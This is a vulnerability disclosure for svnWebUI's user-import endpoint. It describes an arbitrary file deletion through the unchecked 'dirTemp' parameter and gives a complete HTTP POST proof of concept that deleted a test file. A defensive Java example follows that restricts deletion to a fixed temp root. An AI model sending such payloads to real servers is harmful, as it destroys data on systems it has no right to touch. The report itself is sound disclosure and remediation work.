com.cym.controller.UserController#importOver

The system does not perform any security check on the `dirTemp` parameter, which lets an attacker construct a payload that causes arbitrary file deletion in the `FileUtil.del` step; any file on the host can be deleted.

The following is the process for reproducing the vulnerability:

The current path contains the file `test`:

After logging into the system, send this payload:

```http
POST /adminPage/user/importOver HTTP/1.1
Host: 192.168.31.227:6060
Content-Length: 27
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.31.227:6060
Referer: http://192.168.31.227:6060/adminPage/user
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: SOLONID=c898caf824614a45a7032dc54291697d; Hm_lvt_2358d52bb43b2c7c42cb5a060c736de6=1712677313; Hm_lpvt_2358d52bb43b2c7c42cb5a060c736de6=1712677380
Connection: close

dirTemp=/home/svnWebUI/test
```

The file has now been deleted.
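The root cause described above is that a client-controlled path reaches a delete call unchecked. The usual fix is to confine the value to the directory the server itself created for the import and refuse anything that resolves outside it. The following is an added example written for this issue, not code from svnWebUI; the root directory `/tmp/svnwebui-import`, the class name and the method names are assumptions, and the inputs in `main` are constructed.

```java
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Comparator;
import java.util.stream.Stream;

public class SafeTempDelete {
    // Hypothetical root under which the server creates per-import temp directories.
    private static final Path TEMP_ROOT =
            Paths.get("/tmp/svnwebui-import").toAbsolutePath().normalize();

    /** Returns the resolved path, or throws if the input escapes TEMP_ROOT. */
    public static Path resolveInsideRoot(String userSupplied) {
        if (userSupplied == null || userSupplied.isEmpty()) {
            throw new IllegalArgumentException("empty path");
        }
        // resolve(): an absolute input such as "/home/svnWebUI/test" replaces the root
        // entirely; normalize() collapses "../" segments. Either way the candidate no
        // longer starts with TEMP_ROOT, so the check below rejects both forms of escape.
        Path candidate = TEMP_ROOT.resolve(userSupplied).normalize();
        if (candidate.equals(TEMP_ROOT) || !candidate.startsWith(TEMP_ROOT)) {
            throw new IllegalArgumentException("path escapes temp root: " + userSupplied);
        }
        return candidate;
    }

    /** Deletes the temp directory only after the containment check passes. */
    public static boolean deleteTempDir(String userSupplied) throws IOException {
        Path target = resolveInsideRoot(userSupplied);
        // Refuse symlinks: a link placed inside TEMP_ROOT could point anywhere on disk.
        if (Files.isSymbolicLink(target) || !Files.isDirectory(target)) {
            return false;
        }
        // Files.walk does not follow links; walk bottom-up so children go before parents.
        try (Stream<Path> stream = Files.walk(target)) {
            stream.sorted(Comparator.reverseOrder()).forEach(p -> {
                try {
                    Files.delete(p);
                } catch (IOException e) {
                    throw new UncheckedIOException(e);
                }
            });
        }
        return true;
    }

    public static void main(String[] args) {
        // Constructed inputs: one legitimate job directory name and two that must be rejected.
        String[] inputs = {"job-42", "/home/svnWebUI/test", "../../etc"};
        for (String in : inputs) {
            try {
                System.out.println(in + " -> " + resolveInsideRoot(in));
            } catch (IllegalArgumentException e) {
                System.out.println(in + " -> rejected: " + e.getMessage());
            }
        }
    }
}
```

Only `job-42` resolves to a child of the root; the absolute path from the report and the `../` form both fail `startsWith` after normalisation. A stricter variant would not accept a path from the client at all and would instead look the temp directory up by an opaque import id held in the server-side session.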